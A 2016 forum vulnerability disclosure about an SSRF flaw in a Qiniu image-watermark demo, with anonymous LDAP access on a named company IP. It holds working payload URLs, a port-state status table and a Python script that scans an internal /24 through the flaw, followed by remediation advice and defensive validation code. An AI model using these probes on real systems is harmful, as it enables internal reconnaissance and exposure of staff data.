HanDs
Administrator

[July vulnerability disclosure] SSRF on a Qiniu site allows probing the internal network







SSRF on a Qiniu site allows probing the internal network + anonymous LDAP access

Details:

I. SSRF vulnerability

The vulnerable site appears to be a test site.

Code:
http://demos.qiniu.com/demo/qimage/index.html



The vulnerable endpoint first fetches a remote image and then overlays it as a watermark on the current image. Using Baidu's logo as the demonstration image, the result looks like this:

Code:
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast



[screenshot: 2.png]



The base64 string after image/ is the IP and port you want to probe. How do you learn an internal IP in the first place? In this case, one of Qiniu's IPs was found to expose an Elasticsearch instance with unauthenticated access.

[screenshot: 1.PNG]



This tells us that the internal network contains at least the following address range:

Code:
172.30.251.168:9200



Base64-encode http://172.30.251.168:9200 and place it after image/.

Code:
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast



If the IP is alive and the port is open, a 501 error is returned, e.g. when probing http://172.30.251.168:9200

[screenshot: 6.png]



If the IP is not alive or the port is closed, a 502 error is returned, e.g. when probing http://172.30.251.168:1356

[screenshot: 4.png]



Testing established the following pattern.

Code:
403 returned: IP alive and port open, but access to that path is forbidden
404 returned: IP alive and port open, but the image does not exist
501 returned: IP alive and port open
502 returned: IP not alive or port closed



To make testing easier, I wrote a script that checks whether port 80 is open on each host of the 172.30.251.0/24 range; a 501 error means the IP is alive and the port is open. Going a step further, one could identify the application behind a port by probing for its default logo or favicon.ico.

Code:
#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
# Python 2 script (print statement, file(), str-based base64); IPy is a third-party package.
import requests
import base64
from IPy import IP

mask = IP('172.30.251.0/24')
for ip in mask:
    print ip
    # the probed URL carries no explicit port, so this checks port 80 on each host
    b64Domain = base64.b64encode('http://' + str(ip))
    #print b64Domain
    req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)
    print req.text + "\n"
    # append the host and the JSON error the endpoint produced to the results file
    qnfile = file('/tmp/qnscan.txt', 'a')
    qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')
    qnfile.close()



These are the results returned for each host in the range.






II. Anonymous LDAP access

Code:
IP: 115.231.182.75
Port: 389



All of the company's personnel information can be retrieved; that information could be used to brute-force mailboxes or any application that authenticates against LDAP.

[screenshot: 5.png]



While testing, an Onion application you had set up (115.231.182.75:8090) had a vulnerability and I accidentally crashed it during testing; I am truly sorry.

Proof of vulnerability:

See the details above.

Remediation:

1. SSRF: return a single uniform error message so that a user cannot infer the port state of the remote server from the response, and restrict the addresses the server will fetch from so that they can never be internal IPs.

2. LDAP: disable anonymous access on the LDAP server.
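As an added example (my code, not Qiniu's), here is one way to implement fix 1 in Python 3: decode the image/<base64 url> segment of the watermark parameter, reject URLs whose host is a literal or resolved internal address, and collapse every failure into one uniform error. The resolver parameter exists so the check can be exercised offline, and the port allow-list is extra hardening beyond the report's fix; both are assumptions.

```python
# Added example (not Qiniu's code): server-side validation of the
# ".../watermark/1/image/<base64 url>/..." parameter, implementing fix 1 from
# the report: refuse to fetch internal addresses and return one uniform error.
import base64
import ipaddress
import socket
from urllib.parse import urlsplit

# What every failure looks like to the client: no upstream status code and no
# ImageMagick message, so port state cannot be inferred from the response.
UNIFORM_ERROR = {"error": "fetch image url failed"}


def encode_watermark_image(url: str) -> str:
    """Build the image/<b64> segment the way the demo does (standard base64)."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def decode_watermark_image(b64_param: str) -> str:
    """Inverse of encode_watermark_image; tolerates stripped '=' padding."""
    padded = b64_param + "=" * (-len(b64_param) % 4)
    return base64.b64decode(padded, validate=True).decode("utf-8")


def resolve_all(host: str) -> set:
    """Every A/AAAA answer for host, as strings; empty set if it does not resolve."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()


def is_public(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_image_url(b64_param: str, resolver=resolve_all) -> str:
    """Return the decoded URL if it is safe to fetch, else raise ValueError."""
    try:
        url = decode_watermark_image(b64_param)
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        raise ValueError("image parameter is not valid base64")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only http(s) URLs with a host are accepted")
    # Port allow-list: extra hardening beyond the report's fix (assumption).
    if parts.port not in (None, 80, 443):
        raise ValueError("port not allowed")
    try:
        addrs = {str(ipaddress.ip_address(parts.hostname))}  # literal IP
    except ValueError:
        # Hostname: every DNS answer must be public, and decimal/octal forms
        # such as 2130706433 come back from getaddrinfo as 127.0.0.1.
        addrs = resolver(parts.hostname)
    if not addrs or not all(is_public(a) for a in addrs):
        raise ValueError("host is internal, reserved or unresolvable")
    return url


def handle_watermark(b64_param: str, fetch, resolver=resolve_all) -> dict:
    """Endpoint wrapper: any failure collapses to UNIFORM_ERROR.

    fetch(url) must not follow redirects (or must re-run validate_image_url
    on every hop), otherwise a public host can bounce the fetch inside.
    """
    try:
        return fetch(validate_image_url(b64_param, resolver))
    except Exception:  # deliberately broad: nothing upstream may leak out
        return dict(UNIFORM_ERROR)
```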


Posted: 2016-7-6